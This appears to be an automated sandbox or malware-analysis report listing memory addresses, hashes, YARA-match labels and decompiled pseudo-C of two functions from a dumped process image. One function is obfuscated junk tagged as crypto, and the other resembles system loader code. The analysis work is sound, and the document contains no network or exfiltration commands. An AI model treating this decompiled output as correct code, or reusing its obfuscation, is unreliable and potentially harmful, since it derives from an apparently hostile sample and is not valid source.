                                          0x033a1051
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033a0ff1
                                          0x033a0fbe
                                          0x033a0fc3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033a0fc3
                                          0x033a0df3
                                          0x033fe9d5
                                          0x033fe9d7
                                          0x033a1128
                                          0x033a1128
                                          0x033a112b
                                          0x033a112d
                                          0x033a1133
                                          0x033a1133
                                          0x00000000
                                          0x033a112d
                                          0x00000000
                                          0x033fe9d7
                                          0x033a0dc2
                                          0x033a10f6
                                          0x033a0dd4
                                          0x033a0dd7
                                          0x033a0dda
                                          0x033a0de8
                                          0x033a0de9
                                          0x033a0de9
                                          0x033a0dda
                                          0x00000000
                                          0x033a0dc2
                                          0x033a0dac
                                          0x033a0dae
                                          0x033a0db3
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27e00371d9224d94aa7509ebe8391b6894240b4d2a71e57a98ad01842e8dea89
                                          • Instruction ID: ec3aff70b011505b2f0a6ffca799995572012cf673341c0bed049b7271536c07
                                          • Opcode Fuzzy Hash: 27e00371d9224d94aa7509ebe8391b6894240b4d2a71e57a98ad01842e8dea89
                                          • Instruction Fuzzy Hash: A0D1CE31E04A598FDF2CCE9DC9D0BBDFBB9EB44300F18812AD542A76A5D7788981DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041DB36, Relevance: .4, Instructions: 365COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E0041DB36(void* __eax, void* __ebx, signed int __ecx, signed int __edi, signed int __esi) {
				signed int _t47;
				void* _t51;
				signed int _t52;
				signed char _t53;
				signed char _t54;
				signed int _t58;
				signed int _t59;
				signed char _t60;
				signed char _t67;
				signed int _t72;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t101;

				_t84 = __edi;
				asm("sbb edi, [0x1b382833]");
				_t72 =  *0x385c483;
				_pop( *0xf4a1a1f1);
				 *0xb0bae717 = __esi;
				asm("rcr dword [0x50a406d5], 0x23");
				_push(0x930fcc2e);
				 *0xe31d6238 =  *0xe31d6238 << 0xd;
				asm("rcl byte [0xac6ea930], 0x47");
				 *0x6ec939dc =  *0x6ec939dc << 0x26;
				asm("sbb [0x7485648a], cl");
				_t58 = _t72;
				_t47 = (__eax + 0x00000001 & 0xe3f72df4) -  *0x5e50ce15;
				_t92 = ( *0xb0bae717 &  *0x175dc3c4) +  *0x214c83d;
				 *0x289f0365 =  *0x289f0365 << 0xf6;
				 *0xfbdfec33 =  *0xfbdfec33 << 0x1b;
				 *0x9218d422 =  *0x9218d422 >> 0x83;
				_t59 = _t58 &  *0x2364ab96;
				asm("sbb ch, 0x1c");
				asm("sbb ebx, [0x73efd0bc]");
				_t67 = __ecx | 0x1210a0c2;
				asm("adc ch, [0xb623af20]");
				 *0xcbd51303 =  *0xcbd51303 - _t59;
				 *0x9f969dd3 =  *0x9f969dd3 | _t47;
				asm("adc [0x7332b19d], edx");
				L1();
				 *0xf5dfcde8 =  *0xf5dfcde8 >> 0x2f;
				_t60 = _t59 - 1;
				 *0x12ec31a8 =  *0x12ec31a8 ^ _t67;
				asm("rcl dword [0x4ba49f16], 0xa7");
				asm("lodsd");
				asm("sbb ebx, 0xd719f37");
				asm("adc [0xb6ec183a], ah");
				 *0xa7b07504 =  *0xa7b07504 << 0xa8;
				_t68 = _t67 ^  *0xefb9ee0;
				 *0x4889fcea = _t47;
				_t102 = _t101 - 1;
				if((_t72 ^ 0x24a00f1f) -  *0xc2811b24 + 0xd2 != 0) {
					L1:
					 *0xafc4e909 =  *0xafc4e909 << 0x95;
					 *0x45a888cf =  *0x45a888cf + _t92;
					_pop( *0x2e0d36a1);
					_t60 = _t60 +  *0xf04a47fa;
				} else {
					__edi = __edi + 0x791d377b;
					 *0x104c398c =  *0x104c398c + __esp;
					__ecx = __ecx + 1;
					_pop(__edx);
					__ebx = __ebx -  *0xaae01b61;
					asm("rcr byte [0xe909eaa8], 0x4f");
					asm("rcl byte [0x9773a180], 0x1b");
					asm("rcl byte [0x7113e12a], 0xda");
					 *0x130e3916 = __edi;
					if(__ebx <= 0) {
						goto L1;
					} else {
						__edi =  *0xeef5ce7e * 0x530;
						asm("sbb eax, 0x4b1213f1");
						__ah = __ah +  *0x12ec31a8;
						asm("rcr dword [0x318ef217], 0x51");
						 *0x9b8a4c91 =  *0x9b8a4c91 & __esp;
						asm("rcr dword [0x71e2f7c4], 0xf");
						_t24 = __esi;
						__esi =  *0x693d7b92;
						 *0x693d7b92 = _t24;
						asm("sbb ebp, [0xdd53893b]");
						 *0x7675d10 =  *0x7675d10 & __ah;
						__esi =  *0x693d7b92 & 0x579b908c;
						if(__esi >= 0) {
							goto L1;
						} else {
							__edx =  *0x7fe5b17d * 0x73a1;
							__ebx = __ebx &  *0x11e12a97;
							asm("adc [0x9a2d9514], ch");
							_pop(__edx);
							asm("stosb");
							 *0x441834f4 =  *0x441834f4 | __eax;
							_pop(__edx);
							 *0xacd5a5e7 =  *0xacd5a5e7 - __al;
							asm("sbb [0x9a2b8a94], edx");
							_push(__edi);
							__edx =  *0x7fe5b17d * 0x73a1 - 1;
							_push( *0x986e17db);
							asm("scasd");
							__ebp = __ebp +  *0x1303b623;
							_pop(__eax);
							 *0x73abd303 =  *0x73abd303 + __esi;
							 *0x49f0f11e =  *0x49f0f11e | __eax;
							if( *0x49f0f11e == 0) {
								goto L1;
							} else {
								 *0xe3c9e774 =  *0xe3c9e774 >> 0xa0;
								 *0x31a84bfe =  *0x31a84bfe | __edi;
								__edx = __edx ^  *0x561212ec;
								 *0xb705ac06 = __ecx;
								__esi = 0xd0ba7cf8;
								asm("movsb");
								__edx =  *0xa5a3a46a * 0x9e14;
								__al = __al +  *0xa3a5e43a;
								asm("movsb");
								asm("sbb al, [0x9cb68ca2]");
								asm("adc esi, [0x11dc059b]");
								if(__al > 0) {
									goto L1;
								} else {
									__ebx =  *0xa77fbf7f * 0xe93;
									__cl = __cl & 0x00000008;
									__edi = __edi &  *0xb3804997;
									__dl = __dl +  *0x70a260a2;
									asm("adc ecx, 0xca00cc13");
									 *0x5761d5c0 =  *0x5761d5c0 << 0x95;
									asm("lodsd");
									 *0xa84bf6f0 =  *0xa84bf6f0 ^ 0xd0ba7cf8;
									__esi = 0xd0ba7cf8 ^  *0x90b1faef;
									 *0x772ea467 =  *0x772ea467 & 0xd0ba7cf8;
									asm("adc dh, [0x1c2d7100]");
									asm("ror byte [0xa46a68c9], 0x12");
									 *0xb71a05e1 =  *0xb71a05e1 | __dl;
									__cl = __cl +  *0xa7b07400;
									 *0x13fb9ee0 =  *0x13fb9ee0 & 0x0000001c;
									__edi = 0x908ba5cb;
									__ecx = __ecx + 0xd8fa54f7;
									L1();
									asm("rcl dword [0xa84b01e8], 0x86");
									 *0x1e12ec31 =  *0x1e12ec31 << 0;
									asm("scasd");
									asm("scasb");
									__eax = __eax + 1;
									asm("adc [0x148e0f0a], dl");
									 *0x72f5ae0d =  *0x72f5ae0d | __ebx;
									_pop(__ecx);
									if( *0x72f5ae0d != 0) {
										goto L1;
									} else {
										_pop(__ebp);
										 *0x2701418f =  *0x2701418f << 0x28;
										asm("sbb [0x6f482da1], ebx");
										asm("adc ebp, [0xaa781a66]");
										_push(__esp);
										 *0x303066a8 =  *0x303066a8 + 0x1c;
										__ebx = __ebx +  *0xa630e261;
										__bh = __bh + 0xa2;
										__edi = 0xffffffff9edbfdeb;
										asm("adc ecx, [0xe8f81607]");
										 *0xec17c110 =  *0xec17c110 >> 0x90;
										asm("ror dword [0xe5e302fc], 0xae");
										__ebx = __ebx +  *0xf0b2bace;
										 *0x2e745702 =  *0x2e745702 >> 0x9f;
										asm("adc edi, [0x893b0e66]");
										_push(__ebx);
										__edi = 0xffffffff98d314c9;
										__ebx = __ebx &  *0xd47882b8;
										__edx = __edx & 0x90ac4d36;
										asm("adc bl, [0xf8fbfb12]");
										if(__edx < 0) {
											goto L1;
										} else {
											__ecx = __ecx + 0x384be70;
											_push( *0xf4a1a1f1);
											__dh = __dh & 0x0000000c;
											asm("rcr dword [0x84a5b331], 0x62");
											__ebp =  *0xb0132294;
											asm("cmpsw");
											_push(__ebp);
											if( *0xf0ecfbd5 >= __ebp) {
												goto L1;
											} else {
												 *0x6c36973 =  *0x6c36973 + __esp;
												asm("movsb");
												asm("sbb edi, 0xc811cc2e");
												__esi = __eax;
												_pop(__ebx);
												__esi = __esi + 1;
												__ebx = __ebx -  *0x263ce0a9;
												__esp = __esp +  *0x34f4cc6f;
												 *0x155e361a =  *0x155e361a >> 0xc4;
												__ebx = __ebx ^ 0x5deb98cc;
												_pop(__ebx);
												asm("rcr dword [0xbfe97c92], 0xd1");
												__eax = __eax +  *0x5b4cdedb;
												 *0x2a217365 =  *0x2a217365 << 0x75;
												if( *0x2a217365 != 0) {
													goto L1;
												} else {
													__ebx = __ebx |  *0xfe498e75;
													__eax = __eax &  *0x7717c119;
													if(__bl <=  *0x960aac10) {
														goto L1;
													} else {
														__esi =  *0xcb6f6e7e * 0x481a;
														L1();
														 *0xa88805e8 =  *0xa88805e8 + __esi;
														__esp = __esp |  *0x3b0eb4a9;
														asm("ror dword [0x13dd5389], 0x9b");
														__ecx = __ecx -  *0x1fd83606;
														asm("stosd");
														_pop( *0x8b712731);
														_push(__esp);
														 *0xf5dbc8d3 =  *0xf5dbc8d3 >> 0xd6;
														__ebx = __ebx - 1;
														asm("rol byte [0x12ec31a8], 0xf0");
														 *0xba6802ee =  *0xba6802ee << 0x47;
														asm("cmpsw");
														__dl = __dl +  *0xf6009bd2;
														asm("sbb [0xbd770d16], ebx");
														__ah = __ah ^ 0x00000080;
														 *0x69560af4 = __esi;
														if(__ebp >= 0) {
															goto L1;
														} else {
															asm("rcr dword [0xd3019571], 0x5f");
															asm("ror byte [0xc6005b18], 0x78");
															__eax = __eax + 1;
															asm("sbb bh, 0x34");
															asm("adc edx, [0xaa4c47c0]");
															asm("ror dword [0x1eb0a9b], 0x76");
															 *0xbdf3d99f =  *0xbdf3d99f << 0x13;
															 *0xaf201e0b =  *0xaf201e0b >> 0x20;
															 *0xd03b623 =  *0xd03b623 >> 0x68;
															 *0x6df22006 =  *0x6df22006 >> 0x46;
															__edx = __edx &  *0xefedfe36;
															__eax = __eax &  *0x2e50a406;
															asm("sbb edi, 0xe6550ccc");
															if(__edx == 0) {
																goto L1;
																do {
																	do {
																		do {
																			do {
																				do {
																					do {
																						do {
																							do {
																								goto L1;
																							} while (_t60 < 0);
																							asm("rol dword [0xcc521fea], 0x1e");
																							_push(_t68);
																							asm("rcr dword [0xd385ee8f], 0x16");
																							asm("rol dword [0x570d919], 0xca");
																							 *0xa0af9322 =  *0xa0af9322 >> 0x79;
																							asm("adc edx, [0x29c07b16]");
																							 *0x28bb49b4 = (_t60 | 0x000000b2) + 0xcc203693;
																							 *0xc756d085 = _t92;
																							_push( *0xc756d085);
																							_t51 = 0x32 -  *0xabfaad36 -  *0xdc1dc510;
																							 *0xad0ae102 =  *0xad0ae102 &  *0x12fa4fcb;
																							_t68 = 0x4b808c0e;
																							_push( *0xbae23bf7);
																							_t102 = 0xc86709d3;
																							_t60 =  *0x536beec;
																							 *0xc56a0a18 =  *0xc56a0a18 >> 0xf3;
																							_t84 = (_t84 | 0x6822b272) -  *0x5dd48cd + 2;
																							_t92 =  *0xad3eb6b * 0x909e;
																						} while (_t92 == 0);
																						 *0x60b4ef74 =  *0x60b4ef74 << 0x4a;
																						 *0xfd3ea67 =  *0xfd3ea67 + 0x4b808c0e;
																						asm("stosd");
																						_t52 = _t51 - 1;
																						_t60 = (_t60 |  *0xe22f6564) & 0xb5541205;
																					} while (_t60 > 0);
																					_t92 =  *0x8a83ea7f * 0x2af4;
																					asm("adc [0x6cd8c587], edi");
																				} while (_t92 >= 0);
																				_t102 =  *0xc5a85e71;
																				 *0xc5a85e71 = 0xc86709d3;
																				_push( *0x3e2ba59b);
																				 *0x246ca9a3 =  *0x246ca9a3 | 0x5c796b83;
																				 *0x3b2544bf =  *0x3b2544bf >> 0x99;
																				_t68 = 0x4b808c0e +  *0x9237aa96;
																				asm("sbb ecx, [0x99ebf6ec]");
																				asm("adc esi, 0x3f59e8b8");
																				_push(_t60);
																				asm("sbb ebp, [0xaa5c3001]");
																				asm("adc edx, [0xb5d75ea9]");
																				 *0xd5930688 =  *0xd5930688 - 0x5c796b84;
																			} while (( *0x8efe5ebc & _t52) <= 0);
																			_t53 = _t52 & 0x5e238776;
																			asm("adc edi, [0x507d7b26]");
																			_t84 =  *0x5d182001;
																			asm("ror dword [0xa5696b1f], 0xa5");
																			asm("sbb [0xdee53639], esp");
																			_t92 = _t92 |  *0x9da8de68;
																			_t60 = 0x0000002c |  *0xe8323dbc;
																			asm("scasb");
																			_t68 = _t68 + 1;
																		} while (0x4b808c0e < 0);
																		_t54 = _t53 ^ 0x00000086;
																		 *0xa2302b1f =  *0xa2302b1f & _t102;
																		_t20 = _t60 &  *0xa967ff9e;
																		_t60 =  *0xa6efbdba;
																		 *0xa6efbdba = _t20;
																		_t84 = _t84 ^  *0x2e3f66ee;
																		asm("movsw");
																		_pop(_t92);
																	} while (0x5c796b83 != 0);
																	asm("sbb esi, [0x19794f75]");
																	 *0xfe510fca = 0x5c796b83;
																	asm("stosd");
																	_t88 =  *0xfe4a1fcd;
																	 *0x66368e91 =  *0x66368e91 + _t88;
																	asm("adc dl, 0xb0");
																	asm("adc edx, [0x5e9f141b]");
																	_t68 = (_t68 &  *0xb6504bfa) + 1;
																	 *0xcb5f57f0 =  *0xcb5f57f0 ^ 0x4b808c0e;
																	asm("rol dword [0x4362de1b], 0xd0");
																	_push(0x4b808c0e);
																	_t60 = _t60 | 0x000000e4;
																	 *0xd5d43784 =  *0xd5d43784 ^  *0xfe510fca;
																	_t84 = _t88 |  *0xf654d60b;
																} while (_t84 >= 0);
																_push(_t60);
																asm("rcr dword [0xe6959d27], 0x96");
																return _t54 + 1;
															} else {
																__ecx = __ecx ^  *0xe0a7b074;
																_push( *0xba06fb9e);
																__al = __al | 0x00000091;
																return __eax;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

















                                          0x0041db36
                                          0x0041db41
                                          0x0041db47
                                          0x0041db4d
                                          0x0041db59
                                          0x0041db5f
                                          0x0041db66
                                          0x0041db6b
                                          0x0041db85
                                          0x0041db92
                                          0x0041db9e
                                          0x0041dbab
                                          0x0041dbac
                                          0x0041dbb8
                                          0x0041dbbe
                                          0x0041dbc5
                                          0x0041dbcc
                                          0x0041dbd3
                                          0x0041dbdf
                                          0x0041dbe3
                                          0x0041dbe9
                                          0x0041dbef
                                          0x0041dbf5
                                          0x0041dbfb
                                          0x0041dc01
                                          0x0041dc07
                                          0x0041dc0c
                                          0x0041dc13
                                          0x0041dc14
                                          0x0041dc1a
                                          0x0041dc21
                                          0x0041dc22
                                          0x0041dc40
                                          0x0041dc46
                                          0x0041dc4d
                                          0x0041dc53
                                          0x0041dc59
                                          0x0041dc5d
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf9d
                                          0x0041cfa3
                                          0x0041cfa9
                                          0x0041dc63
                                          0x0041dc63
                                          0x0041dc6b
                                          0x0041dc71
                                          0x0041dc72
                                          0x0041dc73
                                          0x0041dc79
                                          0x0041dc80
                                          0x0041dc87
                                          0x0041dc8e
                                          0x0041dc94
                                          0x00000000
                                          0x0041dc9a
                                          0x0041dc9a
                                          0x0041dca4
                                          0x0041dca9
                                          0x0041dcaf
                                          0x0041dcb6
                                          0x0041dcbc
                                          0x0041dcc3
                                          0x0041dcc3
                                          0x0041dcc3
                                          0x0041dccf
                                          0x0041dcd5
                                          0x0041dcdb
                                          0x0041dce1
                                          0x00000000
                                          0x0041dce7
                                          0x0041dce7
                                          0x0041dcf1
                                          0x0041dcf7
                                          0x0041dcfd
                                          0x0041dd04
                                          0x0041dd0e
                                          0x0041dd14
                                          0x0041dd15
                                          0x0041dd1b
                                          0x0041dd21
                                          0x0041dd22
                                          0x0041dd23
                                          0x0041dd2f
                                          0x0041dd30
                                          0x0041dd36
                                          0x0041dd37
                                          0x0041dd3d
                                          0x0041dd43
                                          0x00000000
                                          0x0041dd49
                                          0x0041dd49
                                          0x0041dd50
                                          0x0041dd56
                                          0x0041dd5c
                                          0x0041dd62
                                          0x0041dd67
                                          0x0041dd6e
                                          0x0041dd78
                                          0x0041dd7e
                                          0x0041dd7f
                                          0x0041dd85
                                          0x0041dd8b
                                          0x00000000
                                          0x0041dd91
                                          0x0041dd91
                                          0x0041dd9b
                                          0x0041dd9e
                                          0x0041dda4
                                          0x0041ddaa
                                          0x0041ddb0
                                          0x0041ddb7
                                          0x0041ddbe
                                          0x0041ddca
                                          0x0041ddd0
                                          0x0041ddd6
                                          0x0041dddc
                                          0x0041dde9
                                          0x0041ddef
                                          0x0041ddf5
                                          0x0041de01
                                          0x0041de07
                                          0x0041de0d
                                          0x0041de12
                                          0x0041de19
                                          0x0041de20
                                          0x0041de21
                                          0x0041de22
                                          0x0041de23
                                          0x0041de29
                                          0x0041de2f
                                          0x0041de30
                                          0x00000000
                                          0x0041de36
                                          0x0041de3c
                                          0x0041de3d
                                          0x0041de49
                                          0x0041de4f
                                          0x0041de55
                                          0x0041de56
                                          0x0041de5c
                                          0x0041de62
                                          0x0041de65
                                          0x0041de71
                                          0x0041de77
                                          0x0041de7e
                                          0x0041de85
                                          0x0041de91
                                          0x0041de98
                                          0x0041de9e
                                          0x0041de9f
                                          0x0041dea5
                                          0x0041deab
                                          0x0041deb1
                                          0x0041deb7
                                          0x00000000
                                          0x0041debd
                                          0x0041debd
                                          0x0041dec3
                                          0x0041dec9
                                          0x0041decc
                                          0x0041ded3
                                          0x0041ded9
                                          0x0041dee1
                                          0x0041dee8
                                          0x00000000
                                          0x0041deee
                                          0x0041deee
                                          0x0041def4
                                          0x0041def6
                                          0x0041defc
                                          0x0041defd
                                          0x0041deff
                                          0x0041df06
                                          0x0041df0c
                                          0x0041df12
                                          0x0041df19
                                          0x0041df1f
                                          0x0041df20
                                          0x0041df27
                                          0x0041df2d
                                          0x0041df34
                                          0x00000000
                                          0x0041df3a
                                          0x0041df3a
                                          0x0041df40
                                          0x0041df4c
                                          0x00000000
                                          0x0041df52
                                          0x0041df52
                                          0x0041df5f
                                          0x0041df64
                                          0x0041df6a
                                          0x0041df70
                                          0x0041df77
                                          0x0041df7d
                                          0x0041df7e
                                          0x0041df84
                                          0x0041df85
                                          0x0041df8c
                                          0x0041df8d
                                          0x0041df9a
                                          0x0041dfa1
                                          0x0041dfa3
                                          0x0041dfa9
                                          0x0041dfaf
                                          0x0041dfb8
                                          0x0041dfc4
                                          0x00000000
                                          0x0041dfca
                                          0x0041dfca
                                          0x0041dfd1
                                          0x0041dfd8
                                          0x0041dfd9
                                          0x0041dfdc
                                          0x0041dfe2
                                          0x0041dfe9
                                          0x0041dff0
                                          0x0041dff7
                                          0x0041dffe
                                          0x0041e005
                                          0x0041e00b
                                          0x0041e011
                                          0x0041e01d
                                          0x00000000
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x00000000
                                          0x00000000
                                          0x0041cfb7
                                          0x0041cfd2
                                          0x0041cfd3
                                          0x0041cfda
                                          0x0041cfec
                                          0x0041cff6
                                          0x0041d008
                                          0x0041d024
                                          0x0041d02a
                                          0x0041d031
                                          0x0041d037
                                          0x0041d03d
                                          0x0041d042
                                          0x0041d048
                                          0x0041d054
                                          0x0041d060
                                          0x0041d06d
                                          0x0041d06e
                                          0x0041d06e
                                          0x0041d07e
                                          0x0041d088
                                          0x0041d094
                                          0x0041d0a1
                                          0x0041d0a2
                                          0x0041d0a2
                                          0x0041d0ae
                                          0x0041d0b8
                                          0x0041d0b8
                                          0x0041d0c4
                                          0x0041d0c4
                                          0x0041d0ca
                                          0x0041d0d1
                                          0x0041d0d7
                                          0x0041d0de
                                          0x0041d0e4
                                          0x0041d0ea
                                          0x0041d0f0
                                          0x0041d0f1
                                          0x0041d0f7
                                          0x0041d0fd
                                          0x0041d103
                                          0x0041d10f
                                          0x0041d114
                                          0x0041d11c
                                          0x0041d122
                                          0x0041d12f
                                          0x0041d135
                                          0x0041d13b
                                          0x0041d14e
                                          0x0041d14f
                                          0x0041d14f
                                          0x0041d160
                                          0x0041d169
                                          0x0041d16f
                                          0x0041d16f
                                          0x0041d16f
                                          0x0041d180
                                          0x0041d186
                                          0x0041d189
                                          0x0041d189
                                          0x0041d190
                                          0x0041d196
                                          0x0041d19c
                                          0x0041d19d
                                          0x0041d1a3
                                          0x0041d1af
                                          0x0041d1b2
                                          0x0041d1b8
                                          0x0041d1b9
                                          0x0041d1bf
                                          0x0041d1c6
                                          0x0041d1c7
                                          0x0041d1ca
                                          0x0041d1d0
                                          0x0041d1d0
                                          0x0041d1e6
                                          0x0041d1e8
                                          0x0041d1ef
                                          0x0041e023
                                          0x0041e023
                                          0x0041e029
                                          0x0041e035
                                          0x0041e037
                                          0x0041e037
                                          0x0041e01d
                                          0x0041dfc4
                                          0x0041df4c
                                          0x0041df34
                                          0x0041dee8
                                          0x0041deb7
                                          0x0041de30
                                          0x0041dd8b
                                          0x0041dd43
                                          0x0041dce1
                                          0x0041dc94

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e303106310ff9fa6822c6be55d3a3b5ac64f6795e0841cca200e4503057c775
                                          • Instruction ID: 1da9b9ea002e33e377a203059648b1c7d6c09d43bc5ae3befed9b69b2f83329f
                                          • Opcode Fuzzy Hash: 0e303106310ff9fa6822c6be55d3a3b5ac64f6795e0841cca200e4503057c775
                                          • Instruction Fuzzy Hash: B5023072958785CFDB16CF38DC8A7423BB2F352324B08425EE5A1932D2D778255ACF88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033BD5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E033BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x349d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E033B6600(0x34952d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3497b9c; // 0x0
							_t281 = L033C4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E033EF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3497b90; // 0x779c0000
								if(_t384 == 0) {
									_t353 =  *0x3497b8c; // 0x2f42c98
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E033C2280(_t200, 0x34984d8);
									_t277 =  *0x34985f4; // 0x2f43188
									_t351 =  *0x34985f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x2f43120
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E033BFFB0(_t287, _t353, 0x34984d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E033FCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E033B6600(0x34952d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E033B7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x349b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0342E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3498472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x349b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x349b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E033C2280(_t250, 0x34984d8);
														_t342 =  *(_t353 + 0x54);
